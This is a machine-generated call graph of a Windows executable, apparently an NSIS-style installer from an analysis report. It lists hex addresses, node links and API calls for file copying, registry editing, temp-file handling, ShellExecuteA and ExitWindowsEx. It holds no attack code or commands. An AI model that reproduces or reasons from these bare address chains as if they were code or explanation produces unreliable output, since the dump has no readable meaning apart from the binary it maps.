4052c5 SendMessageA 3696->3697 3697->3697 3699 4052e2 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3697->3699 3700 405304 SendMessageA 3699->3700 3700->3700 3701 405325 GlobalUnlock SetClipboardData CloseClipboard 3700->3701 3701->3672 3702->3662 3703->3691 3704->3663 3705 401cc2 3709 402a0c 3705->3709 3707 401cd2 SetWindowLongA 3708 4028be 3707->3708 3710 405bba 18 API calls 3709->3710 3711 402a20 3710->3711 3711->3707 3712 401a43 3713 402a0c 18 API calls 3712->3713 3714 401a49 3713->3714 3715 402a0c 18 API calls 3714->3715 3716 4019f3 3715->3716 3724 402648 3725 40264b 3724->3725 3728 402663 3724->3728 3726 402658 FindNextFileA 3725->3726 3727 4026a2 3726->3727 3726->3728 3730 405b98 lstrcpynA 3727->3730 3730->3728 3734 401bca 3735 402a0c 18 API calls 3734->3735 3736 401bd1 3735->3736 3737 402a0c 18 API calls 3736->3737 3738 401bdb 3737->3738 3739 401beb 3738->3739 3740 402a29 18 API calls 3738->3740 3741 401bfb 3739->3741 3742 402a29 18 API calls 3739->3742 3740->3739 3743 401c06 3741->3743 3744 401c4a 3741->3744 3742->3741 3745 402a0c 18 API calls 3743->3745 3746 402a29 18 API calls 3744->3746 3747 401c0b 3745->3747 3748 401c4f 3746->3748 3749 402a0c 18 API calls 3747->3749 3750 402a29 18 API calls 3748->3750 3751 401c14 3749->3751 3752 401c58 FindWindowExA 3750->3752 3753 401c3a SendMessageA 3751->3753 3754 401c1c SendMessageTimeoutA 3751->3754 3755 401c76 3752->3755 3753->3755 3754->3755 3756 40424b 3757 404281 3756->3757 3758 40425b 3756->3758 3760 403ebb 8 API calls 3757->3760 3759 403e54 19 API calls 3758->3759 3761 404268 SetDlgItemTextA 3759->3761 3762 40428d 3760->3762 3761->3757 3763 4024cf 3764 402a29 18 API calls 3763->3764 3765 4024d6 3764->3765 3768 40586f GetFileAttributesA CreateFileA 3765->3768 3767 4024e2 3768->3767 2984 401751 3022 402a29 2984->3022 2986 401758 2987 401776 2986->2987 2988 40177e 2986->2988 3071 405b98 lstrcpynA 2987->3071 3072 405b98 lstrcpynA 2988->3072 2991 40177c 3028 405dfa 2991->3028 2992 401789 3073 40568b lstrlenA CharPrevA 2992->3073 2999 4017b2 CompareFileTime 3017 40179b 2999->3017 3000 401876 3038 404e84 3000->3038 3001 40184d 3003 404e84 25 API calls 3001->3003 3011 401862 3001->3011 3003->3011 3007 4018a7 SetFileTime 3008 4018b9 FindCloseChangeNotification 3007->3008 3010 4018ca 3008->3010 3008->3011 3012 4018e2 3010->3012 3013 4018cf 3010->3013 3016 405bba 18 API calls 3012->3016 3015 405bba 18 API calls 3013->3015 3014 405b98 lstrcpynA 3014->3017 3018 4018d7 lstrcatA 3015->3018 3019 4018ea 3016->3019 3017->2999 3017->3000 3017->3001 3017->3014 3037 40586f GetFileAttributesA CreateFileA 3017->3037 3076 405e93 FindFirstFileA 3017->3076 3079 405850 GetFileAttributesA 3017->3079 3082 405bba 3017->3082 3101 405459 3017->3101 3018->3019 3021 405459 MessageBoxIndirectA 3019->3021 3021->3011 3023 402a35 3022->3023 3024 405bba 18 API calls 3023->3024 3025 402a56 3024->3025 3026 402a62 3025->3026 3027 405dfa 5 API calls 3025->3027 3026->2986 3027->3026 3035 405e06 3028->3035 3029 405e6e 3030 405e72 CharPrevA 3029->3030 3033 405e8d 3029->3033 3030->3029 3031 405e63 CharNextA 3031->3029 3031->3035 3033->3017 3034 405e51 CharNextA 3034->3035 3035->3029 3035->3031 3035->3034 3036 405e5e CharNextA 3035->3036 3105 4056b6 3035->3105 3036->3031 3037->3017 3039 404e9f 3038->3039 3047 401880 3038->3047 3040 404ebc lstrlenA 3039->3040 3041 405bba 18 API calls 3039->3041 3042 404ee5 3040->3042 3043 404eca lstrlenA 3040->3043 3041->3040 3045 404ef8 3042->3045 3046 404eeb SetWindowTextA 3042->3046 3044 404edc lstrcatA 3043->3044 3043->3047 3044->3042 3045->3047 3048 404efe SendMessageA SendMessageA SendMessageA 3045->3048 3046->3045 3049 402e8e 3047->3049 3048->3047 3050 402ea4 3049->3050 3051 402ecf 3050->3051 3118 4030b3 SetFilePointer 3050->3118 3109 403081 ReadFile 3051->3109 3055 403015 3057 403019 3055->3057 3058 403031 3055->3058 3056 402eec GetTickCount 3059 402eff 3056->3059 3060 403081 ReadFile 3057->3060 3061 403081 ReadFile 3058->3061 3062 401893 3058->3062 3064 40304c WriteFile 3058->3064 3059->3062 3063 403081 ReadFile 3059->3063 3067 402f65 GetTickCount 3059->3067 3068 402f8e MulDiv wsprintfA 3059->3068 3070 402fcc WriteFile 3059->3070 3111 406025 3059->3111 3060->3062 3061->3058 3062->3007 3062->3008 3063->3059 3064->3062 3065 403061 3064->3065 3065->3058 3065->3062 3067->3059 3069 404e84 25 API calls 3068->3069 3069->3059 3070->3059 3070->3062 3071->2991 3072->2992 3074 40178f lstrcatA 3073->3074 3075 4056a5 lstrcatA 3073->3075 3074->2991 3075->3074 3077 405eb4 3076->3077 3078 405ea9 FindClose 3076->3078 3077->3017 3078->3077 3080 40586c 3079->3080 3081 40585f SetFileAttributesA 3079->3081 3080->3017 3081->3080 3087 405bc7 3082->3087 3083 405de1 3084 405df6 3083->3084 3126 405b98 lstrcpynA 3083->3126 3084->3017 3086 405c5f GetVersion 3094 405c6c 3086->3094 3087->3083 3087->3086 3088 405db8 lstrlenA 3087->3088 3090 405bba 10 API calls 3087->3090 3096 405dfa 5 API calls 3087->3096 3124 405af6 wsprintfA 3087->3124 3125 405b98 lstrcpynA 3087->3125 3088->3087 3090->3088 3093 405cd7 GetSystemDirectoryA 3093->3094 3094->3087 3094->3093 3095 405cea GetWindowsDirectoryA 3094->3095 3097 405bba 10 API calls 3094->3097 3098 405d61 lstrcatA 3094->3098 3099 405d1e SHGetSpecialFolderLocation 3094->3099 3119 405a7f RegOpenKeyExA 3094->3119 3095->3094 3096->3087 3097->3094 3098->3087 3099->3094 3100 405d36 SHGetPathFromIDListA CoTaskMemFree 3099->3100 3100->3094 3102 40546e 3101->3102 3103 4054ba 3102->3103 3104 405482 MessageBoxIndirectA 3102->3104 3103->3017 3104->3103 3106 4056bc 3105->3106 3107 4056cf 3106->3107 3108 4056c2 CharNextA 3106->3108 3107->3035 3108->3106 3110 402eda 3109->3110 3110->3055 3110->3056 3110->3062 3112 40604a 3111->3112 3113 406052 3111->3113 3112->3059 3113->3112 3114 4060e2 GlobalAlloc 3113->3114 3115 4060d9 GlobalFree 3113->3115 3116 406150 GlobalFree 3113->3116 3117 406159 GlobalAlloc 3113->3117 3114->3112 3114->3113 3115->3114 3116->3117 3117->3112 3117->3113 3118->3051 3120 405af0 3119->3120 3121 405ab2 RegQueryValueExA 3119->3121 3120->3094 3122 405ad3 RegCloseKey 3121->3122 3122->3120 3124->3087 3125->3087 3126->3084 3769 401651 3770 402a29 18 API calls 3769->3770 3771 401657 3770->3771 3772 405e93 2 API calls 3771->3772 3773 40165d 3772->3773 3774 401951 3775 402a0c 18 API calls 3774->3775 3776 401958 3775->3776 3777 402a0c 18 API calls 3776->3777 3778 401962 3777->3778 3779 402a29 18 API calls 3778->3779 3780 40196b 3779->3780 3781 40197e lstrlenA 3780->3781 3782 4019b9 3780->3782 3783 401988 3781->3783 3783->3782 3787 405b98 lstrcpynA 3783->3787 3785 4019a2 3785->3782 3786 4019af lstrlenA 3785->3786 3786->3782 3787->3785 3788 4019d2 3789 402a29 18 API calls 3788->3789 3790 4019d9 3789->3790 3791 402a29 18 API calls 3790->3791 3792 4019e2 3791->3792 3793 4019e9 lstrcmpiA 3792->3793 3794 4019fb lstrcmpA 3792->3794 3795 4019ef 3793->3795 3794->3795 3796 402053 3797 402a29 18 API calls 3796->3797 3798 40205a 3797->3798 3799 402a29 18 API calls 3798->3799 3800 402064 3799->3800 3801 402a29 18 API calls 3800->3801 3802 40206d 3801->3802 3803 402a29 18 API calls 3802->3803 3804 402077 3803->3804 3805 402a29 18 API calls 3804->3805 3807 402081 3805->3807 3806 402095 CoCreateInstance 3809 40216a 3806->3809 3812 4020b4 3806->3812 3807->3806 3808 402a29 18 API calls 3807->3808 3808->3806 3810 401423 25 API calls 3809->3810 3811 40219c 3809->3811 3810->3811 3812->3809 3813 402149 MultiByteToWideChar 3812->3813 3813->3809 3814 4047d3 GetDlgItem GetDlgItem 3815 404827 7 API calls 3814->3815 3823 404a44 3814->3823 3816 4048c0 SendMessageA 3815->3816 3817 4048cd DeleteObject 3815->3817 3816->3817 3818 4048d8 3817->3818 3820 40490f 3818->3820 3822 405bba 18 API calls 3818->3822 3819 404b2e 3821 404bdd 3819->3821 3825 404a37 3819->3825 3830 404b87 SendMessageA 3819->3830 3824 403e54 19 API calls 3820->3824 3826 404bf2 3821->3826 3827 404be6 SendMessageA 3821->3827 3828 4048f1 SendMessageA SendMessageA 3822->3828 3823->3819 3846 404ab8 3823->3846 3867 404753 SendMessageA 3823->3867 3829 404923 3824->3829 3831 403ebb 8 API calls 3825->3831 3838 404c04 ImageList_Destroy 3826->3838 3839 404c0b 3826->3839 3843 404c1b 3826->3843 3827->3826 3828->3818 3834 403e54 19 API calls 3829->3834 3830->3825 3836 404b9c SendMessageA 3830->3836 3837 404dcd 3831->3837 3832 404b20 SendMessageA 3832->3819 3847 404931 3834->3847 3835 404d81 3835->3825 3844 404d93 ShowWindow GetDlgItem ShowWindow 3835->3844 3841 404baf 3836->3841 3838->3839 3842 404c14 GlobalFree 3839->3842 3839->3843 3840 404a05 GetWindowLongA SetWindowLongA 3845 404a1e 3840->3845 3853 404bc0 SendMessageA 3841->3853 3842->3843 3843->3835 3852 40140b 2 API calls 3843->3852 3861 404c4d 3843->3861 3844->3825 3848 404a24 ShowWindow 3845->3848 3849 404a3c 3845->3849 3846->3819 3846->3832 3847->3840 3851 404980 SendMessageA 3847->3851 3854 4049ff 3847->3854 3856 4049bc SendMessageA 3847->3856 3857 4049cd SendMessageA 3847->3857 3865 403e89 SendMessageA 3848->3865 3866 403e89 SendMessageA 3849->3866 3851->3847 3852->3861 3853->3821 3854->3840 3854->3845 3856->3847 3857->3847 3858 404d57 InvalidateRect 3858->3835 3859 404d6d 3858->3859 3872 40470e 3859->3872 3860 404c7b SendMessageA 3864 404c91 3860->3864 3861->3860 3861->3864 3863 404d05 SendMessageA SendMessageA 3863->3864 3864->3858 3864->3863 3865->3825 3866->3823 3868 4047b2 SendMessageA 3867->3868 3869 404776 GetMessagePos ScreenToClient SendMessageA 3867->3869 3870 4047aa 3868->3870 3869->3870 3871 4047af 3869->3871 3870->3846 3871->3868 3875 404649 3872->3875 3874 404723 3874->3835 3876 40465f 3875->3876 3877 405bba 18 API calls 3876->3877 3878 4046c3 3877->3878 3879 405bba 18 API calls 3878->3879 3880 4046ce 3879->3880 3881 405bba 18 API calls 3880->3881 3882 4046e4 lstrlenA wsprintfA SetDlgItemTextA 3881->3882 3882->3874 3883 404dd4 3884 404de2 3883->3884 3885 404df9 3883->3885 3886 404de8 3884->3886 3901 404e62 3884->3901 3887 404e07 IsWindowVisible 3885->3887 3890 404e1e 3885->3890 3891 403ea0 SendMessageA 3886->3891 3889 404e14 3887->3889 3887->3901 3888 404e68 CallWindowProcA 3892 404df2 3888->3892 3893 404753 5 API calls 3889->3893 3890->3888 3902 405b98 lstrcpynA 3890->3902 3891->3892 3893->3890 3895 404e4d 3903 405af6 wsprintfA 3895->3903 3897 404e54 3898 40140b 2 API calls 3897->3898 3899 404e5b 3898->3899 3904 405b98 lstrcpynA 3899->3904 3901->3888 3902->3895 3903->3897 3904->3901 3905 4061d4 3911 406058 3905->3911 3906 4069c3 3907 4060e2 GlobalAlloc 3907->3906 3907->3911 3908 4060d9 GlobalFree 3908->3907 3909 406150 GlobalFree 3910 406159 GlobalAlloc 3909->3910 3910->3906 3910->3911 3911->3906 3911->3907 3911->3908 3911->3909 3911->3910 3912 402256 3913 40225e 3912->3913 3918 402264 3912->3918 3914 402a29 18 API calls 3913->3914 3914->3918 3915 402a29 18 API calls 3917 402274 3915->3917 3916 402282 3920 402a29 18 API calls 3916->3920 3917->3916 3919 402a29 18 API calls 3917->3919 3918->3915 3918->3917 3919->3916 3921 40228b WritePrivateProfileStringA 3920->3921 3922 4014d6 3923 402a0c 18 API calls 3922->3923 3924 4014dc Sleep 3923->3924 3926 4028be 3924->3926 3927 40245a 3937 402b33 3927->3937 3929 402464 3930 402a0c 18 API calls 3929->3930 3931 40246d 3930->3931 3932 402490 RegEnumValueA 3931->3932 3933 402484 RegEnumKeyA 3931->3933 3935 40268f 3931->3935 3934 4024a9 RegCloseKey 3932->3934 3932->3935 3933->3934 3934->3935 3938 402a29 18 API calls 3937->3938 3939 402b4c 3938->3939 3940 402b5a RegOpenKeyExA 3939->3940 3940->3929 3941 4022da 3942 40230a 3941->3942 3943 4022df 3941->3943 3945 402a29 18 API calls 3942->3945 3944 402b33 19 API calls 3943->3944 3946 4022e6 3944->3946 3947 402311 3945->3947 3948 402a29 18 API calls 3946->3948 3951 402327 3946->3951 3952 402a69 RegOpenKeyExA 3947->3952 3950 4022f7 RegDeleteValueA RegCloseKey 3948->3950 3950->3951 3957 402a94 3952->3957 3961 402ae0 3952->3961 3953 402aba RegEnumKeyA 3954 402acc RegCloseKey 3953->3954 3953->3957 3955 405f28 5 API calls 3954->3955 3958 402adc 3955->3958 3956 402af1 RegCloseKey 3956->3961 3957->3953 3957->3954 3957->3956 3959 402a69 5 API calls 3957->3959 3960 402b0c RegDeleteKeyA 3958->3960 3958->3961 3959->3957 3960->3961 3961->3951 3962 40155b 3963 401565 3962->3963 3964 401577 ShowWindow 3963->3964 3965 40157e 3963->3965 3964->3965 3966 40158c ShowWindow 3965->3966 3967 4028be 3965->3967 3966->3967 3975 401cde GetDlgItem GetClientRect 3976 402a29 18 API calls 3975->3976 3977 401d0e LoadImageA SendMessageA 3976->3977 3978 401d2c DeleteObject 3977->3978 3979 4028be 3977->3979 3978->3979 3980 401dde 3981 402a29 18 API calls 3980->3981 3982 401de4 3981->3982 3983 402a29 18 API calls 3982->3983 3984 401ded 3983->3984 3985 402a29 18 API calls 3984->3985 3986 401df6 3985->3986 3987 402a29 18 API calls 3986->3987 3988 401dff 3987->3988 3989 401423 25 API calls 3988->3989 3990 401e06 ShellExecuteA 3989->3990 3991 401e33 3990->3991 3992 401662 3993 402a29 18 API calls 3992->3993 3994 401669 3993->3994 3995 402a29 18 API calls 3994->3995 3996 401672 3995->3996 3997 402a29 18 API calls 3996->3997 3998 40167b MoveFileA 3997->3998 3999 40168e 3998->3999 4005 401687 3998->4005 4001 405e93 2 API calls 3999->4001 4003 40219c 3999->4003 4000 401423 25 API calls 4000->4003 4002 40169d 4001->4002 4002->4003 4004 4058e6 40 API calls 4002->4004 4004->4005 4005->4000 4006 401ee2 4007 402a29 18 API calls 4006->4007 4008 401ee9 4007->4008 4009 405f28 5 API calls 4008->4009 4010 401ef8 4009->4010 4011 401f10 GlobalAlloc 4010->4011 4016 401f78 4010->4016 4012 401f24 4011->4012 4011->4016 4013 405f28 5 API calls 4012->4013 4014 401f2b 4013->4014 4015 405f28 5 API calls 4014->4015 4017 401f35 4015->4017 4017->4016 4021 405af6 wsprintfA 4017->4021 4019 401f6c 4022 405af6 wsprintfA 4019->4022 4021->4019 4022->4016 4023 4023e2 4024 402b33 19 API calls 4023->4024 4025 4023ec 4024->4025 4026 402a29 18 API calls 4025->4026 4027 4023f5 4026->4027 4028 4023ff RegQueryValueExA 4027->4028 4033 40268f 4027->4033 4029 40241f 4028->4029 4030 402425 RegCloseKey 4028->4030 4029->4030 4034 405af6 wsprintfA 4029->4034 4030->4033 4034->4030 4035 4045e3 4036 4045f3 4035->4036 4037 40460f 4035->4037 4046 40543d GetDlgItemTextA 4036->4046 4039 404642 4037->4039 4040 404615 SHGetPathFromIDListA 4037->4040 4042 40462c SendMessageA 4040->4042 4043 404625 4040->4043 4041 404600 SendMessageA 4041->4037 4042->4039 4044 40140b 2 API calls 4043->4044 4044->4042 4046->4041 4047 403f68 lstrcpynA lstrlenA 4048 402b6e 4049 402b7d SetTimer 4048->4049 4051 402b96 4048->4051 4049->4051 4050 402beb 4051->4050 4052 402bb0 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4051->4052 4052->4050 4053 4014f0 SetForegroundWindow 4054 4028be 4053->4054 4055 402671 4056 402a29 18 API calls 4055->4056 4057 402678 FindFirstFileA 4056->4057 4058 40269b 4057->4058 4059 40268b 4057->4059 4060 4026a2 4058->4060 4063 405af6 wsprintfA 4058->4063 4064 405b98 lstrcpynA 4060->4064 4063->4060 4064->4059 4065 4024f1 4066 4024f6 4065->4066 4067 402507 4065->4067 4069 402a0c 18 API calls 4066->4069 4068 402a29 18 API calls 4067->4068 4070 40250e lstrlenA 4068->4070 4071 4024fd 4069->4071 4070->4071 4072 40252d WriteFile 4071->4072 4073 40268f 4071->4073 4072->4073 4086 4018f5 4087 40192c 4086->4087 4088 402a29 18 API calls 4087->4088 4089 401931 4088->4089 4090 4054bd 70 API calls 4089->4090 4091 40193a 4090->4091 4092 4018f8 4093 402a29 18 API calls 4092->4093 4094 4018ff 4093->4094 4095 405459 MessageBoxIndirectA 4094->4095 4096 401908 4095->4096 3420 4030fb SetErrorMode GetVersion 3421 403133 3420->3421 3422 403139 3420->3422 3423 405f28 5 API calls 3421->3423 3424 405eba 3 API calls 3422->3424 3423->3422 3425 40314f lstrlenA 3424->3425 3425->3422 3426 40315e 3425->3426 3427 405f28 5 API calls 3426->3427 3428 403165 3427->3428 3429 405f28 5 API calls 3428->3429 3430 40316c #17 OleInitialize SHGetFileInfoA 3429->3430 3510 405b98 lstrcpynA 3430->3510 3432 4031a9 GetCommandLineA 3511 405b98 lstrcpynA 3432->3511 3434 4031bb GetModuleHandleA 3435 4031d2 3434->3435 3436 4056b6 CharNextA 3435->3436 3437 4031e6 CharNextA 3436->3437 3443 4031f3 3437->3443 3438 403260 3439 403273 GetTempPathA 3438->3439 3512 4030ca 3439->3512 3441 403289 3444 4032b1 DeleteFileA 3441->3444 3445 40328d GetWindowsDirectoryA lstrcatA 3441->3445 3442 4056b6 CharNextA 3442->3443 3443->3438 3443->3442 3449 403262 3443->3449 3522 402c55 GetTickCount GetModuleFileNameA 3444->3522 3447 4030ca 12 API calls 3445->3447 3448 4032a9 3447->3448 3448->3444 3451 403332 ExitProcess OleUninitialize 3448->3451 3606 405b98 lstrcpynA 3449->3606 3450 4032c5 3450->3451 3453 40331e 3450->3453 3457 4056b6 CharNextA 3450->3457 3454 403456 3451->3454 3455 403347 3451->3455 3550 4035eb 3453->3550 3459 4034f9 ExitProcess 3454->3459 3464 405f28 5 API calls 3454->3464 3458 405459 MessageBoxIndirectA 3455->3458 3461 4032dc 3457->3461 3463 403355 ExitProcess 3458->3463 3460 40332e 3460->3451 3468 4032f9 3461->3468 3469 40335d 3461->3469 3465 403469 3464->3465 3466 405f28 5 API calls 3465->3466 3467 403472 3466->3467 3470 405f28 5 API calls 3467->3470 3472 40576c 18 API calls 3468->3472 3471 4053e0 5 API calls 3469->3471 3473 40347b 3470->3473 3474 403362 lstrcatA 3471->3474 3475 403304 3472->3475 3476 403499 3473->3476 3485 403489 GetCurrentProcess 3473->3485 3477 403373 lstrcatA 3474->3477 3478 40337e lstrcatA lstrcmpiA 3474->3478 3475->3451 3607 405b98 lstrcpynA 3475->3607 3481 405f28 5 API calls 3476->3481 3477->3478 3478->3451 3479 40339a 3478->3479 3482 4033a6 3479->3482 3483 40339f 3479->3483 3486 4034d0 3481->3486 3490 4053c3 2 API calls 3482->3490 3488 405346 4 API calls 3483->3488 3484 403313 3608 405b98 lstrcpynA 3484->3608 3485->3476 3487 4034e5 ExitWindowsEx 3486->3487 3492 4034f2 3486->3492 3487->3459 3487->3492 3491 4033a4 3488->3491 3493 4033ab SetCurrentDirectoryA 3490->3493 3491->3493 3494 40140b 2 API calls 3492->3494 3495 4033c5 3493->3495 3496 4033ba 3493->3496 3494->3459 3610 405b98 lstrcpynA 3495->3610 3609 405b98 lstrcpynA 3496->3609 3499 4033d3 3500 405bba 18 API calls 3499->3500 3503 40344a 3499->3503 3504 4058e6 40 API calls 3499->3504 3507 405bba 18 API calls 3499->3507 3508 4053f8 2 API calls 3499->3508 3509 403436 CloseHandle 3499->3509 3501 4033f5 DeleteFileA 3500->3501 3501->3499 3502 403402 CopyFileA 3501->3502 3502->3499 3505 4058e6 40 API calls 3503->3505 3504->3499 3506 403451 3505->3506 3506->3451 3507->3499 3508->3499 3509->3499 3510->3432 3511->3434 3513 405dfa 5 API calls 3512->3513 3515 4030d6 3513->3515 3514 4030e0 3514->3441 3515->3514 3516 40568b 3 API calls 3515->3516 3517 4030e8 3516->3517 3518 4053c3 2 API calls 3517->3518 3519 4030ee 3518->3519 3611 40589e 3519->3611 3615 40586f GetFileAttributesA CreateFileA 3522->3615 3524 402c95 3544 402ca5 3524->3544 3616 405b98 lstrcpynA 3524->3616 3526 402cbb 3527 4056d2 2 API calls 3526->3527 3528 402cc1 3527->3528 3617 405b98 lstrcpynA 3528->3617 3530 402ccc GetFileSize 3531 402ce3 3530->3531 3547 402dc8 3530->3547 3534 403081 ReadFile 3531->3534 3537 402e34 3531->3537 3531->3544 3546 402bf1 6 API calls 3531->3546 3531->3547 3533 402dd1 3535 402e01 GlobalAlloc 3533->3535 3533->3544 3629 4030b3 SetFilePointer 3533->3629 3534->3531 3630 4030b3 SetFilePointer 3535->3630 3541 402bf1 6 API calls 3537->3541 3539 402dea 3542 403081 ReadFile 3539->3542 3540 402e1c 3543 402e8e 37 API calls 3540->3543 3541->3544 3545 402df5 3542->3545 3548 402e28 3543->3548 3544->3450 3545->3535 3545->3544 3546->3531 3618 402bf1 3547->3618 3548->3544 3549 402e65 SetFilePointer 3548->3549 3549->3544 3551 405f28 5 API calls 3550->3551 3552 4035ff 3551->3552 3553 403617 3552->3553 3555 403605 3552->3555 3554 405a7f 3 API calls 3553->3554 3556 403638 3554->3556 3640 405af6 wsprintfA 3555->3640 3558 403656 lstrcatA 3556->3558 3560 405a7f 3 API calls 3556->3560 3559 403615 3558->3559 3631 4038b4 3559->3631 3560->3558 3563 40576c 18 API calls 3564 403688 3563->3564 3565 403711 3564->3565 3567 405a7f 3 API calls 3564->3567 3566 40576c 18 API calls 3565->3566 3568 403717 3566->3568 3569 4036b4 3567->3569 3570 403727 LoadImageA 3568->3570 3571 405bba 18 API calls 3568->3571 3569->3565 3574 4036d0 lstrlenA 3569->3574 3578 4056b6 CharNextA 3569->3578 3572 403752 RegisterClassA 3570->3572 3573 4037db 3570->3573 3571->3570 3575 4037e5 3572->3575 3576 40378e SystemParametersInfoA CreateWindowExA 3572->3576 3577 40140b 2 API calls 3573->3577 3579 403704 3574->3579 3580 4036de lstrcmpiA 3574->3580 3575->3460 3576->3573 3581 4037e1 3577->3581 3583 4036ce 3578->3583 3582 40568b 3 API calls 3579->3582 3580->3579 3584 4036ee GetFileAttributesA 3580->3584 3581->3575 3585 4038b4 19 API calls 3581->3585 3586 40370a 3582->3586 3583->3574 3587 4036fa 3584->3587 3588 4037f2 3585->3588 3641 405b98 lstrcpynA 3586->3641 3587->3579 3590 4056d2 2 API calls 3587->3590 3591 403881 3588->3591 3592 4037fe ShowWindow 3588->3592 3590->3579 3642 404f56 OleInitialize 3591->3642 3594 405eba 3 API calls 3592->3594 3596 403816 3594->3596 3595 403887 3597 4038a3 3595->3597 3598 40388b 3595->3598 3599 403824 GetClassInfoA 3596->3599 3601 405eba 3 API calls 3596->3601 3600 40140b 2 API calls 3597->3600 3598->3575 3604 40140b 2 API calls 3598->3604 3602 403838 GetClassInfoA RegisterClassA 3599->3602 3603 40384e DialogBoxParamA 3599->3603 3600->3575 3601->3599 3602->3603 3605 40140b 2 API calls 3603->3605 3604->3575 3605->3575 3606->3439 3607->3484 3608->3453 3609->3495 3610->3499 3612 4058a9 GetTickCount GetTempFileNameA 3611->3612 3613 4058d5 3612->3613 3614 4030f9 3612->3614 3613->3612 3613->3614 3614->3441 3615->3524 3616->3526 3617->3530 3619 402c12 3618->3619 3620 402bfa 3618->3620 3623 402c22 GetTickCount 3619->3623 3624 402c1a 3619->3624 3621 402c03 DestroyWindow 3620->3621 3622 402c0a 3620->3622 3621->3622 3622->3533 3626 402c30 CreateDialogParamA ShowWindow 3623->3626 3627 402c53 3623->3627 3625 405f64 2 API calls 3624->3625 3628 402c20 3625->3628 3626->3627 3627->3533 3628->3533 3629->3539 3630->3540 3632 4038c8 3631->3632 3649 405af6 wsprintfA 3632->3649 3634 403939 3635 405bba 18 API calls 3634->3635 3636 403945 SetWindowTextA 3635->3636 3637 403961 3636->3637 3638 403666 3636->3638 3637->3638 3639 405bba 18 API calls 3637->3639 3638->3563 3639->3637 3640->3559 3641->3565 3643 403ea0 SendMessageA 3642->3643 3644 404f79 3643->3644 3647 401389 2 API calls 3644->3647 3648 404fa0 3644->3648 3645 403ea0 SendMessageA 3646 404fb2 OleUninitialize 3645->3646 3646->3595 3647->3644 3648->3645 3649->3634 4097 4014fe 4098 401506 4097->4098 4100 401519 4097->4100 4099 402a0c 18 API calls 4098->4099 4099->4100 4101 4025ff 4102 402606 4101->4102 4103 40286b 4101->4103 4104 402a0c 18 API calls 4102->4104 4105 402611 4104->4105 4106 402618 SetFilePointer 4105->4106 4106->4103 4107 402628 4106->4107 4109 405af6 wsprintfA 4107->4109 4109->4103 4110 401000 4111 401037 BeginPaint GetClientRect 4110->4111 4113 40100c DefWindowProcA 4110->4113 4114 4010f3 4111->4114 4117 401179 4113->4117 4115 401073 CreateBrushIndirect FillRect DeleteObject 4114->4115 4116 4010fc 4114->4116 4115->4114 4118 401102 CreateFontIndirectA 4116->4118 4119 401167 EndPaint 4116->4119 4118->4119 4120 401112 6 API calls 4118->4120 4119->4117 4120->4119 3127 403981 3128 403ad4 3127->3128 3129 403999 3127->3129 3130 403b25 3128->3130 3131 403ae5 GetDlgItem GetDlgItem 3128->3131 3129->3128 3132 4039a5 3129->3132 3134 403b7f 3130->3134 3226 401389 3130->3226 3223 403e54 3131->3223 3135 4039b0 SetWindowPos 3132->3135 3136 4039c3 3132->3136 3145 403acf 3134->3145 3200 403ea0 3134->3200 3135->3136 3137 4039e0 3136->3137 3138 4039c8 ShowWindow 3136->3138 3141 403a02 3137->3141 3142 4039e8 DestroyWindow 3137->3142 3138->3137 3139 403b0f SetClassLongA 3143 40140b 2 API calls 3139->3143 3147 403a07 SetWindowLongA 3141->3147 3148 403a18 3141->3148 3146 403dfe 3142->3146 3143->3130 3146->3145 3155 403e0e ShowWindow 3146->3155 3147->3145 3152 403ac1 3148->3152 3153 403a24 GetDlgItem 3148->3153 3150 40140b 2 API calls 3167 403b91 3150->3167 3151 403ddf DestroyWindow EndDialog 3151->3146 3209 403ebb 3152->3209 3156 403a54 3153->3156 3157 403a37 SendMessageA IsWindowEnabled 3153->3157 3154 403b5b SendMessageA 3154->3145 3155->3145 3160 403a61 3156->3160 3162 403aa8 SendMessageA 3156->3162 3163 403a74 3156->3163 3171 403a59 3156->3171 3157->3145 3157->3156 3159 405bba 18 API calls 3159->3167 3160->3162 3160->3171 3162->3152 3164 403a91 3163->3164 3165 403a7c 3163->3165 3169 40140b 2 API calls 3164->3169 3203 40140b 3165->3203 3166 403a8f 3166->3152 3167->3150 3167->3151 3167->3159 3170 403e54 19 API calls 3167->3170 3173 403e54 19 API calls 3167->3173 3172 403a98 3169->3172 3170->3167 3206 403e2d 3171->3206 3172->3152 3172->3171 3174 403c0c GetDlgItem 3173->3174 3175 403c21 3174->3175 3176 403c29 ShowWindow EnableWindow 3174->3176 3175->3176 3230 403e76 EnableWindow 3176->3230 3178 403c53 EnableWindow 3181 403c67 3178->3181 3179 403c6c GetSystemMenu EnableMenuItem SendMessageA 3180 403c9c SendMessageA 3179->3180 3179->3181 3180->3181 3181->3179 3231 403e89 SendMessageA 3181->3231 3232 405b98 lstrcpynA 3181->3232 3184 403cca lstrlenA 3185 405bba 18 API calls 3184->3185 3186 403cdb SetWindowTextA 3185->3186 3187 401389 2 API calls 3186->3187 3188 403cec 3187->3188 3188->3145 3188->3167 3189 403d1f DestroyWindow 3188->3189 3191 403d1a 3188->3191 3189->3146 3190 403d39 CreateDialogParamA 3189->3190 3190->3146 3192 403d6c 3190->3192 3191->3145 3193 403e54 19 API calls 3192->3193 3194 403d77 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3193->3194 3195 401389 2 API calls 3194->3195 3196 403dbd 3195->3196 3196->3145 3197 403dc5 ShowWindow 3196->3197 3198 403ea0 SendMessageA 3197->3198 3199 403ddd 3198->3199 3199->3146 3201 403eb8 3200->3201 3202 403ea9 SendMessageA 3200->3202 3201->3167 3202->3201 3204 401389 2 API calls 3203->3204 3205 401420 3204->3205 3205->3171 3207 403e34 3206->3207 3208 403e3a SendMessageA 3206->3208 3207->3208 3208->3166 3210 403ed3 GetWindowLongA 3209->3210 3220 403f5c 3209->3220 3211 403ee4 3210->3211 3210->3220 3212 403ef3 GetSysColor 3211->3212 3213 403ef6 3211->3213 3212->3213 3214 403f06 SetBkMode 3213->3214 3215 403efc SetTextColor 3213->3215 3216 403f24 3214->3216 3217 403f1e GetSysColor 3214->3217 3215->3214 3218 403f35 3216->3218 3219 403f2b SetBkColor 3216->3219 3217->3216 3218->3220 3221 403f48 DeleteObject 3218->3221 3222 403f4f CreateBrushIndirect 3218->3222 3219->3218 3220->3145 3221->3222 3222->3220 3224 405bba 18 API calls 3223->3224 3225 403e5f SetDlgItemTextA 3224->3225 3225->3139 3227 401390 3226->3227 3228 4013fe 3227->3228 3229 4013cb MulDiv SendMessageA 3227->3229 3228->3134 3228->3154 3229->3227 